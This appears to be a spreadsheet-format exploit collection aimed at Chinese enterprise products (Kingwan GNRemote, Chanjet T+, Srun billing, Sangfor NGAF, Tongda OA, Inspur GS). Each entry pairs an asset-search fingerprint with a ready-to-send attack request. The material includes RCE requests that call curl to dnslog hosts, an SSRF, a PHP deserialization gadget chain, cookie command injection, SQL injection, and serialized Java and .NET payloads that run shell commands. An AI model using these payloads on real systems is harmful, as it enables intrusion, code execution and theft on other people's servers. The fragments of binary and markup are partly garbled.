1\x00\x99\x00\x00\x00\xff\x00\x04\x00\x04\x00\x00\x00\x9b+\xc6\x00\x0c\x126+\xb6\x007\x99\x00\x06\x128\xb0+\xb6\x009L+\x12:\xb6\x00;\x99\x00;*+\xb7\x00&lt;\x12=\xb6\x00&gt;M,\xbe\x05\x9f\x00\x06\x12?\xb0*,\x032\xb5\x00@*,\x042\xb8\x00A\xb8\x00'\xb5\x00B\xbb\x00CY*\xb7\x00DN-\xb6\x00E\x12F\xb0+\x12G\xb6\x00;\x99\x00\"*+\xb7\x00&lt;\x12=\xb6\x00&gt;M,\xbe\x05\x9f\x00\x06\x12H\xb0*,\x032,\x042\xb6\x00I\xb0+\x12J\xb6\x00;\x99\x00\x0d**+\xb7\x00&lt;\xb6\x00K\xb0**+\xb7\x00&lt;\xb6\x00K\xb0\x00\x00\x00\x01\x00\x9a\x00\x00\x00R\x00\x14\x00\x00\x00k\x00\x0d\x00l\x00\x10\x00n\x00\x15\x00o\x00\x1e\x00q\x00\x29\x00r\x00/\x00s\x002\x00u\x009\x00v\x00F\x00w\x00O\x00x\x00S\x00y\x00V\x00z\x00_\x00\x7b\x00j\x00|\x00p\x00\x7d\x00s\x00\x7f\x00~\x00\x80\x00\x87\x00\x81\x00\x91\x00\x83\x00\x01\x00\xa2\x00\xa3\x00\x01\x00\x99\x00\x00\x00v\x00\x03\x00\x05\x00\x00\x006\xbb\x00LY+\xb7\x00MN\xbb\x00NY-\xb7\x00O:\x04\x19\x04,\xb8\x00P\xb6\x00Q\x19\x04\xb6\x00R\x19\x04\xb6\x00S\xa7\x00\x0b:\x04\x19\x04\xb6\x00T\xb0-\xb6\x00U\xb0\x00\x01\x00\x09\x00&amp;\x00\x29\x00/\x00\x01\x00\x9a\x00\x00\x00&amp;\x00\x09\x00\x00\x00\x8e\x00\x09\x00\x90\x00\x13\x00\x91\x00\x1c\x00\x92\x00!\x00\x93\x00&amp;\x00\x96\x00\x29\x00\x94\x00+\x00\x95\x001\x00\x97\x00\x02\x00\xa4\x00\xa1\x00\x01\x00\x99\x00\x00\x00/\x00\x03\x00\x02\x00\x00\x00\x17+\x12:\x126\xb6\x00V\x12J\x126\xb6\x00V\x12G\x126\xb6\x00V\xb0\x00\x00\x00\x01\x00\x9a\x00\x00\x00\x06\x00\x01\x00\x00\x00\xa0\x00\x01\x00\xa5\x00\xa1\x00\x01\x00\x99\x00\x00\x01\xc3\x00\x04\x00\x09\x00\x00\x01'\x12W\xb8\x00X\xb6\x00YM+\xb6\x009L\x01N,\x12Z\xb6\x00\x0c\x99\x00@+\x12[\xb6\x00\x0c\x99\x00 +\x12\\\xb6\x00\x0c\x9a\x00\x17\xbb\x00]Y\xb7\x00^+\xb6\x00_\x12`\xb6\x00_\xb6\x00aL\x06\xbd\x00!Y\x03\x12\"SY\x04\x12bSY\x05+S:\x04\xa7\x00=+\x12[\xb6\x00\x0c\x99\x00 +\x12\\\xb6\x00\x0c\x9a\x00\x17\xbb\x00]Y\xb7\x00^+\xb6\x00_\x12c\xb6\x00_\xb6\x00aL\x06\xbd\x00!Y\x03\x12dSY\x04\x12eSY\x05+S:\x04\xb8\x00f\x19\x04\xb6\x00gN\xbb\x00hY-\xb6\x00i\xb7\x00j\x12k\xb6\x00l:\x05\x19\x05\xb6\x00m\x99\x00\x0b\x19\x05\xb6\x00n\xa7\x00\x05\x126:\x06\xbb\x00hY-\xb6\x00o\xb7\x00j\x12k\xb6\x00l:\x05\xbb\x00]Y\xb7\x00^\x19\x06\xb6\x00_\x19\x05\xb6\x00m\x99\x00\x0b\x19\x05\xb6\x00n\xa7\x00\x05\x126\xb6\x00_\xb6\x00a:\x06\x19\x06:\x07-\xc6\x00\x07-\xb6\x00p\x19\x07\xb0:\x05\x19\x05\xb6\x00T:\x06-\xc6\x00\x07-\xb6\x00p\x19\x06\xb0:\x08-\xc6\x00\x07-\xb6\x00p\x19\x08\xbf\x00\x04\x00\x90\x00\xfb\x01\x06\x00/\x00\x90\x00\xfb\x01\x1a\x00\x00\x01\x06\x01\x0f\x01\x1a\x00\x00\x01\x1a\x01\x1c\x01\x1a\x00\x00\x00\x01\x00\x9a\x00\x00\x00j\x00\x1a\x00\x00\x00\xa9\x00\x09\x00\xaa\x00\x0e\x00\xab\x00\x10\x00\xad\x00\x19\x00\xae\x00+\x00\xaf\x00?\x00\xb1\x00V\x00\xb3\x00h\x00\xb4\x00|\x00\xb6\x00\x90\x00\xb9\x00\x99\x00\xba\x00\xab\x00\xbb\x00\xbf\x00\xbc\x00\xd1\x00\xbd\x00\xf7\x00\xbe\x00\xfb\x00\xc2\x00\xff\x00\xc3\x01\x03\x00\xbe\x01\x06\x00\xbf\x01\x08\x00\xc0\x01\x0f\x00\xc2\x01\x13\x00\xc3\x01\x17\x00\xc0\x01\x1a\x00\xc2\x01 \x00\xc3\x00\x01\x00\xa6\x00\xa7\x00\x01\x00\x99\x00\x00\x01r\x00\x04\x00\x0c\x00\x00\x00\xe2\x12W\xb8\x00X\xb6\x00Y\x12Z\xb6\x00\x0c\x9a\x00\x09\x12qN\xa7\x00\x06\x12rN\xb8\x00f-\xb6\x00s:\x04\xbb\x00tY+\x1c\xb7\x00u:\x05\x19\x04\xb6\x00i:\x06\x19\x04\xb6\x00o:\x07\x19\x05\xb6\x00v:\x08\x19\x04\xb6\x00w:\x09\x19\x05\xb6\x00x:\x0a\x19\x05\xb6\x00y\x9a\x00`\x19\x06\xb6\x00z\x9e\x00\x10\x19\x0a\x19\x06\xb6\x00\x7b\xb6\x00|\xa7\xff\xee\x19\x07\xb6\x00z\x9e\x00\x10\x19\x0a\x19\x07\xb6\x00\x7b\xb6\x00|\xa7\xff\xee\x19\x08\xb6\x00z\x9e\x00\x10\x19\x09\x19\x08\xb6\x00\x7b\xb6\x00|\xa7\xff\xee\x19\x0a\xb6\x00\x7d\x19\x09\xb6\x00\x7d\x14\x00~\xb8\x00\x80\x19\x04\xb6\x00\x81W\xa7\x00\x08:\x0b\xa7\xff\x9e\x19\x04\xb6\x00p\x19\x05\xb6\x00\x82\xa7\x00 N\xbb\x00]Y\xb7\x00^\x12\x83\xb6\x00_-\xb6\x00\x84\xb6\x00_\x12\x85\xb6\x00_\xb6\x00a\xb0\x12\x86\xb0\x00\x02\x00\xa7\x00\xad\x00\xb0\x00/\x00\x00\x00\xbf\x00\xc2\x00/\x00\x01\x00\x9a\x00\x00\x00n\x00\x1b\x00\x00\x00\xd1\x00\x10\x00\xd2\x00\x16\x00\xd4\x00\x19\x00\xd6\x00\"\x00\xd7\x00-\x00\xd8\x00B\x00\xd9\x00P\x00\xda\x00X\x00\xdb\x00`\x00\xdc\x00m\x00\xde\x00u\x00\xdf\x00\x82\x00\xe1\x00\x8a\x00\xe2\x00\x97\x00\xe4\x00\x9c\x00\xe5\x00\xa1\x00\xe6\x00\xa7\x00\xe8\x00\xad\x00\xe9\x00\xb0\x00\xea\x00\xb2\x00\xeb\x00\xb5\x00\xed\x00\xba\x00\xee\x00\xbf\x00\xf1\x00\xc2\x00\xef\x00\xc3\x00\xf0\x00\xdf\x00\xf2\x00\x01\x00\xa8\x00\x98\x00\x01\x00\x99\x00\x00\x00-\x00\x03\x00\x01\x00\x00\x00\x11**\xb4\x00@*\xb4\x00B\xb6\x00\x87\xb6\x00\x88W\xb1\x00\x00\x00\x01\x00\x9a\x00\x00\x00\x0a\x00\x02\x00\x00\x00\xf7\x00\x10\x00\xf8\x00\x09\x00\xa9\x00\xaa\x00\x01\x00\x99\x00\x00\x01\x1c\x00\x06\x00\x04\x00\x00\x00\xac\x01L\x12\x89\xb8\x002M,\x12\x8a\x04\xbd\x00\x1cY\x03\x12!S\xb6\x00\x1d,\xb6\x00*\x04\xbd\x00\x1eY\x03*S\xb6\x00\x1f\xc0\x00,\xc0\x00,L\xa7\x00\x04M+\xc7\x00C\x12\x8b\xb8\x002\x12\x8c\x03\xbd\x00\x1c\xb6\x00\x1d\x01\x03\xbd\x00\x1e\xb6\x00\x1fM,\xb6\x00\x04\x12\x8d\x04\xbd\x00\x1cY\x03\x12!S\xb6\x00\x1d,\x04\xbd\x00\x1eY\x03*S\xb6\x00\x1f\xc0\x00,\xc0\x00,L\xa7\x00\x04M+\xc7\x004\x12\x8e\xb8\x002M,\x12\x8d\x04\xbd\x00\x1cY\x03\x12!S\xb6\x00\x1dN-,\xb6\x00*\x04\xbd\x00\x1eY\x03*S\xb6\x00\x1f\xc0\x00,\xc0\x00,L\xa7\x00\x04M+\xb0\x00\x03\x00\x02\x00-\x000\x00/\x005\x00q\x00t\x00/\x00y\x00\xa6\x00\xa9\x00/\x00\x01\x00\x9a\x00\x00\x00F\x00\x11\x00\x00\x01\x00\x00\x02\x01\x02\x00\x08\x01\x03\x00-\x01\x06\x000\x01\x04\x001\x01\x07\x005\x01\x09\x00L\x01\x0a\x00q\x01\x0d\x00t\x01\x0b\x00u\x01\x0f\x00y\x01\x11\x00\x7f\x01\x12\x00\x8f\x01\x13\x00\xa6\x01\x16\x00\xa9\x01\x14\x00\xaa\x01\x18\x00\x01\x00\xab\x00\x00\x00\x02\x00\xact\x00\x0bdefineClassuq\x00~\x00\x1a\x00\x00\x00\x02vr\x00\x10java.lang.String\xa0\xf0\xa48z;\xb3B\x02\x00\x00xpvq\x00~\x00\x28sq\x00~\x00\x13uq\x00~\x00\x18\x00\x00\x00\x01uq\x00~\x00\x1a\x00\x00\x00\x00q\x00~\x00\x1cuq\x00~\x00\x1a\x00\x00\x00\x01q\x00~\x00\x1esq\x00~\x00\x13uq\x00~\x00\x18\x00\x00\x00\x01uq\x00~\x00\x18\x00\x00\x00\x00q\x00~\x00\"uq\x00~\x00\x1a\x00\x00\x00\x01q\x00~\x00$sq\x00~\x00\x0fsq\x00~\x00\x00w\x0c\x00\x00\x00\x10?@\x00\x00\x00\x00\x00\x00xsr\x00\x11java.util.HashMap\x05\x07\xda\xc1\xc3\x16`\xd1\x03\x00\x02F\x00\x0aloadFactorI\x00\x09thresholdxp?@\x00\x00\x00\x00\x00\x00w\x08\x00\x00\x00\x10\x00\x00\x00\x00xxx")}}</t>
  </si>
  <si>
    <t>金万维-云联应用系统接入平台 GNRemote.dll 前台RCE</t>
  </si>
  <si>
    <t>title="云联应用系统接入平台"</t>
  </si>
  <si>
    <t>GET /GNRemote.dll?GNFunction=CallPython&amp;pyFile=os&amp;pyFunc=system&amp;pyArgu=curl+xxx.dnslog.cn HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close</t>
  </si>
  <si>
    <t>畅捷通ajaxpro接口 ssrf</t>
  </si>
  <si>
    <t>app="畅捷通-TPlus"</t>
  </si>
  <si>
    <t>POST /tplus/ajaxpro/Ufida.T.SM.UIP.UA.AddressSettingController,Ufida.T.SM.UIP.ashx?method=TestConnnect HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ASP.NET_SessionId=sfzg0pgxvld3ltgimecqkjg4; Hm_lvt_fd4ca40261bc424e2d120b806d985a14=1721822405; Hm_lpvt_fd4ca40261bc424e2d120b806d985a14=1721822415; HMACCOUNT=AFE08148BD092161
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
{
  "address":"ftlhbc.dnslog.cn"
}</t>
  </si>
  <si>
    <t>深澜计费管理系统strategy 反序列化</t>
  </si>
  <si>
    <t>"/js/lib/slimscroll.js"</t>
  </si>
  <si>
    <t>&lt;?php
namespace yii\base {
  class Component {
    private $_events = array();
    private $_behaviors = 1;
    public function __construct() {
      include("./vendor/opis/closure/autoload.php");
      $func = function() {
        $cmd = 'touch /tmp/hacker';
        system($cmd);
      }
      ;
      $raw = \Opis\Closure\serialize($func);
      $data=\Opis\Closure\unserialize($raw);
      $this-&gt;_events = ["afterOpen" =&gt; [[
       $data,
       "huahua"
       ]]];
    }
  }
}
namespace yii\redis {
  use yii\base\Component;
  class Connection extends Component {
    public $redisCommands = [];
    public $hostname = '';
    public $port;
    public $password;
    public $username;
    public $connectionTimeout;
    public $dataTimeout;
    public $database;
    public $unixSocket;
    private $_socket;
    public function __construct() {
      $this-&gt;redisCommands = array('CLEAN UP');
      $this-&gt;_socket = false;
      $this-&gt;hostname = '127.0.0.1';
      $this-&gt;port = 8001;
      //能够连通的任意本地服务的端⼝
      $this-&gt;unixSocket = false;
      $this-&gt;connectionTimeout = 5;
      parent::__construct();
    }
  }
}
namespace setasign\Fpdi\PdfReader {
  use yii\redis\Connection;
  class PdfReader {
    protected $parser;
    public function __construct() {
      $this-&gt;parser = new Connection;
    }
  }
  include("./vendor/opis/closure/autoload.php");
  echo urlencode(\Opis\Closure\serialize(new PdfReader));
}
?&gt;
POST /strategy/ip/bind-ip HTTP/2
Host: 
Cookie: lang=zh-CN; PHPSESSID_8080=f434cd5f5e9befe38ab3d688b49eacb5; _csrf-8080=515a2ce1d579e3eb33de0fb00d2eddb40cbfb5db938eb248ddaa2069ed9ba803a%3A2%3A%7Bi%3A0%3Bs%3A10%3A%22_csrf-8080%22%3Bi%3A1%3Bs%3A32%3A%22zKeB2l7C4-gTmKM4dulmKqnWGCnlHFDP%22%3B%7D
Cache-Control: max-age=0
Sec-Ch-Ua: "Not A(Brand";v="99", "Google Chrome";v="121", "Chromium";v="121"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none</t>
  </si>
  <si>
    <t>深信服下一代防火墙NGAF存在任意文件上传漏洞（老洞）</t>
  </si>
  <si>
    <t>title="SANGFOR | NGAF"</t>
  </si>
  <si>
    <t>POST /cgi-bin/login.cgi HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: 127.0.0.1
Content-Type: Application/X-www-Form
Cookie: PHPSESSID=`$(echo 7258052001 &gt; /fwlib/sys/virus/webui/svpn_html/502082888.txt)`;
Content-Length: 111
{"opr":"login", "data":{"user": "watchTowr" , "pwd": "watchTowr" , "vericode": "EINW" , "privacy_enable": "0"}}</t>
  </si>
  <si>
    <t>通达OA V11.10 login SQL注入</t>
  </si>
  <si>
    <t>body="/static/templates/2019_01/left_bg.png"</t>
  </si>
  <si>
    <t>POST /ispirit/interface/login.php HTTP/1.1 
User-Agent:Mozilla/5.0(Macintosh;IntelMacOSX10_12_6) 
AppleWebKit/537.36(KHTML,likeGecko)Chrome/69.0.855.2Safari/537.36 
Content-Type:application/x-www-form-urlencoded 
Host: 
Content-Length:107
name=123&amp;pass=123&amp;_SERVER[REMOTE_ADDR]=1','10',(select+@`,'`+or+if(1%
3d0,1,(select+~0%2b1))+limit+0,1))--+'</t>
  </si>
  <si>
    <t>浪潮GS企业管理软件 多处 .NET反序列化RCE</t>
  </si>
  <si>
    <t>body="/cwbase/web/scripts/jquery.js" || icon_hash="-1341069524"</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>POST</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> /cwbase/service/rps/xtdysrv.asmx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WOW64)</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> AppleWebKit/537.36</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> (KHTML,like</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> Gecko)</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> Chrome/61.0.1191.80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http://tempuri.org/SavePrintFormatAssign</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>"</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
cmd:</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> dir</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&lt;SavePrintFormatAssign</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&lt;psBizObj&gt;string&lt;/psBizObj&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
&lt;psLxId&gt;string&lt;/psLxId&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
&lt;psLxMc&gt;string&lt;/psLxMc&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
&lt;printOpByte&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C4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAwAAAAZfaXRlbXMFX3NpemUIX3ZlcnNpb24FAAAICAkCAAAACgAAAAoAAAAQAgAAABAAAAAJAwAAAAkEAAAACQUAAAAJBgAAAAkHAAAACQgAAAAJCQAAAAkKAAAACQsAAAAJDAAAAA0GBwMAAAABAQAAAAEAAAAHAgkNAAAADA4AAABhU3lzdGVtLldvcmtmbG93LkNvbXBvbmVudE1vZGVsLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MzFiZjM4NTZhZDM2NGUzNQUEAAAAalN5c3RlbS5Xb3JrZmxvdy5Db21wb25lbnRNb2RlbC5TZXJpYWxpemF0aW9uLkFjdGl2aXR5U3Vycm9nYXRlU2VsZWN0b3IrT2JqZWN0U3Vycm9nYXRlK09iamVjdFNlcmlhbGl6ZWRSZWYCAAAABHR5cGULbWVtYmVyRGF0YXMDBR9TeXN0ZW0uVW5pdHlTZXJpYWxpemF0aW9uSG9sZGVyDgAAAAkPAAAACRAAAAABBQAAAAQAAAAJEQAAAAkSAAAAAQYAAAAEAAAACRMAAAAJFAAAAAEHAAAABAAAAAkVAAAACRYAAAABCAAAAAQAAAAJFwAAAAkYAAAAAQkAAAAEAAAACRkAAAAJGgAAAAEKAAAABAAAAAkbAAAACRwAAAABCwAAAAQAAAAJHQAAAAkeAAAABAwAAAAcU3lzdGVtLkNvbGxlY3Rpb25zLkhhc2h0YWJsZQcAAAAKTG9hZEZhY3RvcgdWZXJzaW9uCENvbXBhcmVyEEhhc2hDb2RlUHJvdmlkZXIISGFzaFNpemUES2V5cwZWYWx1ZXMAAAMDAAUFCwgcU3lzdGVtLkNvbGxlY3Rpb25zLklDb21wYXJlciRTeXN0ZW0uQ29sbGVjdGlvbnMuSUhhc2hDb2RlUHJvdmlkZXII7FE4PwIAAAAKCgMAAAAJHwAAAAkgAAAADw0AAAAAEAAAAk1akAADAAAABAAAAP//AAC4AAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAOH7oOALQJzSG4AUzNIVRoaXMgcHJvZ3JhbSBjYW5ub3QgYmUgcnVuIGluIERPUyBtb2RlLg0NCiQAAAAAAAAAUEUAAEwBAwBrydRkAAAAAAAAAADgAAIhCwELAAAIAAAABgAAAAAAAN4mAAAAIAAAAEAAAAAAABAAIAAAAAIAAAQAAAAAAAAABAAAAAAAAAAAgAAAAAIAAAAAAAADAECFAAAQAAAQAAAAABAAABAAAAAAAAAQAAAAAAAAAAAAAACQJgAASwAAAABAAACoAgAAAAAAAAAAAAAAAAAAAAAAAABgAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAgAAAAAAAAAAAAAAAggAABIAAAAAAAAAAAAAAAudGV4dAAAAOQGAAAAIAAAAAgAAAACAAAAAAAAAAAAAAAAAAAgAABgLnJzcmMAAACoAgAAAEAAAAAEAAAACgAAAAAAAAAAAAAAAAAAQAAAQC5yZWxvYwAADAAAAABgAAAAAgAAAA4AAAAAAAAAAAAAAAAAAEAAAEIAAAAAAAAAAAAAAAAAAAAAwCYAAAAAAABIAAAAAgAFADAhAABgBQAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAbMAMAwwAAAAEAABECKAMAAAooBAAACgoGbwUAAApvBgAACgZvBwAACm8IAAAKcwkAAAoLB28KAAAKcgEAAHBvCwAACgZvDAAACm8NAAAKchEAAHBvDgAACgwHbwoAAApyGQAAcAgoDwAACm8QAAAKB28KAAAKF28RAAAKB28KAAAKF28SAAAKB28KAAAKFm8TAAAKB28UAAAKJgdvFQAACm8WAAAKDQZvBwAACglvFwAACt4DJt4ABm8HAAAKbxgAAAoGbwcAAApvGQAACioAARAAAAAAIgCHqQADDgAAAUJTSkIBAAEAAAAAAAwAAAB2NC4wLjMwMzE5AAAAAAUAbAAAALwBAAAjfgAAKAIAAHQCAAAjU3RyaW5ncwAAAACcBAAAJAAAACNVUwDABAAAEAAAACNHVUlEAAAA0AQAAJAAAAAjQmxvYgAAAAAAAAACAAABRxQCAAkAAAAA+iUzABYAAAEAAAAOAAAAAgAAAAEAAAAZAAAAAgAAAAEAAAABAAAAAwAAAAAACgABAAAAAAAGACkAIgAGAFYANgAGAHYANgAKAKgAnQAKAMAAnQAKAOgAnQAOABsBCAEOACMBCAEKAE8BnQAOAIYBZwEGAK8BIgAGACQCGgIGAEQCGgIGAGkCIgAAAAAAAQAAAAAAAQABAAAAEAAXAAAABQABAAEAUCAAAAAAhhgwAAoAAQARADAADgAZADAACgAJADAACgAhALQAHAAhANIAIQApAN0ACgAhAPUAJgAxAAIBCgA5ADAACgA5ADQBKwBBAEIBMAAhAFsBNQBJAJoBOgBRAKYBPwBZALYBRABBAL0BMABBAMsBSgBBAOYBSgBBAAACSgA5ABQCTwA5ADECUwBpAE8CWAAxAFkCMAAxAF8CCgAxAGUCCgAuAAsAZQAuABMAbgBcAASAAAAAAAAAAAAAAAAAAAAAAJQAAAAEAAAAAAAAAAAAAAABABkAAAAAAAQAAAAAAAAAAAAAABMAnQAAAAAABAAAAAAAAAAAAAAAAQAiAAAAAAAAAAA8TW9kdWxlPgBrd3V3YWNwdy5kbGwARQBtc2NvcmxpYgBTeXN0ZW0AT2JqZWN0AC5jdG9yAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBrd3V3YWNwdwBTeXN0ZW0uV2ViAEh0dHBDb250ZXh0AGdldF9DdXJyZW50AEh0dHBTZXJ2ZXJVdGlsaXR5AGdldF9TZXJ2ZXIAQ2xlYXJFcnJvcgBIdHRwUmVzcG9uc2UAZ2V0X1Jlc3BvbnNlAENsZWFyAFN5c3RlbS5EaWFnbm9zdGljcwBQcm9jZXNzAFByb2Nlc3NTdGFydEluZm8AZ2V0X1N0YXJ0SW5mbwBzZXRfRmlsZU5hbWUASHR0cFJlcXVlc3QAZ2V0X1JlcXVlc3QAU3lzdGVtLkNvbGxlY3Rpb25zLlNwZWNpYWxpemVkAE5hbWVWYWx1ZUNvbGxlY3Rpb24AZ2V0X0hlYWRlcnMAZ2V0X0l0ZW0AU3RyaW5nAENvbmNhdABzZXRfQXJndW1lbnRzAHNldF9SZWRpcmVjdFN0YW5kYXJkT3V0cHV0AHNldF9SZWRpcmVjdFN0YW5kYXJkRXJyb3IAc2V0X1VzZVNoZWxsRXhlY3V0ZQBTdGFydABTeXN0ZW0uSU8AU3RyZWFtUmVhZGVyAGdldF9TdGFuZGFyZE91dHB1dABUZXh0UmVhZGVyAFJlYWRUb0VuZABXcml0ZQBGbHVzaABFbmQARXhjZXB0aW9uAAAAD2MAbQBkAC4AZQB4AGUAAAdjAG0AZAAABy8AYwAgAAAAAAA2IZXU/G1oT7AM+EyvNpdOAAi3elxWGTTgiQMgAAEEIAEBCAiwP19/EdUKOgQAABIRBCAAEhUEIAASGQQgABIhBCABAQ4EIAASJQQgABIpBCABDg4FAAIODg4EIAEBAgMgAAIEIAASMQMgAA4IBwQSERIdDg4IAQAIAAAAAAAeAQABAFQCFldyYXBOb25FeGNlcHRpb25UaHJvd3MBAAAAuCYAAAAAAAAAAAAAziYAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAmAAAAAAAAAABfQ29yRGxsTWFpbgBtc2NvcmVlLmRsbAAAAAAA/yUAI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EAAAABgAAIAAAAAAAAAAAAAAAAAAAAEAAQAAADAAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAEgAAABYQAAATAIAAAAAAAAAAAAATAI0AAAAVgBTAF8AVgBFAFIAUwBJAE8ATgBfAEkATgBGAE8AAAAAAL0E7/4AAAEAAAAAAAAAAAAAAAAAAAAAAD8AAAAAAAAABAAAAAIAAAAAAAAAAAAAAAAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8AAAAAACQABAAAAFQAcgBhAG4AcwBsAGEAdABpAG8AbgAAAAAAAACwBKwBAAABAFMAdAByAGkAbgBnAEYAaQBsAGUASQBuAGYAbwAAAIgBAAABADAAMAAwADAAMAA0AGIAMAAAACwAAgABAEYAaQBsAGUARABlAHMAYwByAGkAcAB0AGkAbwBuAAAAAAAgAAAAMAAIAAEARgBpAGwAZQBWAGUAcgBzAGkAbwBuAAAAAAAwAC4AMAAuADAALgAwAAAAPAANAAEASQBuAHQAZQByAG4AYQBsAE4AYQBtAGUAAABrAHcAdQB3AGEAYwBwAHcALgBkAGwAbAAAAAAAKAACAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAAIAAAAEQADQABAE8AcgBpAGcAaQBuAGEAbABGAGkAbABlAG4AYQBtAGUAAABrAHcAdQB3AGEAYwBwAHcALgBkAGwAbAAAAAAANAAIAAEAUAByAG8AZAB1AGMAdABWAGUAcgBzAGkAbwBuAAAAMAAuADAALgAwAC4AMAAAADgACAABAEEAcwBzAGUAbQBiAGwAeQAgAFYAZQByAHMAaQBvAG4AAAAwAC4AMAAuADAALg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wAAADgN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DwAAAB9TeXN0ZW0uVW5pdHlTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAREYXRhCVVuaXR5VHlwZQxBc3NlbWJseU5hbWUBAAEIBiEAAAD+AVN5c3RlbS5MaW5xLkVudW1lcmFibGUrV2hlcmVTZWxlY3RFbnVtZXJhYmxlSXRlcmF0b3JgMltbU3lzdGVtLkJ5dGVbXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHksIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAYiAAAATlN5c3RlbS5Db3JlLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4ORAQAAAABwAAAAkDAAAACgkkAAAACggIAAAAAAoICAEAAAABEQAAAA8AAAAGJQAAAPUCU3lzdGVtLkxpbnEuRW51bWVyYWJsZStXaGVyZVNlbGVjdEVudW1lcmFibGVJdGVyYXRvcm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QAAAAJIgAAABASAAAABwAAAAkEAAAACgkoAAAACggIAAAAAAoICAEAAAABEwAAAA8AAAAGKQAAAN8DU3lzdGVtLkxpbnEuRW51bWVyYWJsZStXaGVyZVNlbGVjdEVudW1lcmFibGVJdGVyYXRvcm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EAAAACSIAAAAQFAAAAAcAAAAJBQAAAAoJLAAAAAoICAAAAAAKCAgBAAAAARUAAAAPAAAABi0AAADmAlN5c3RlbS5MaW5xLkVudW1lcmFibGUrV2hlcmVTZWxl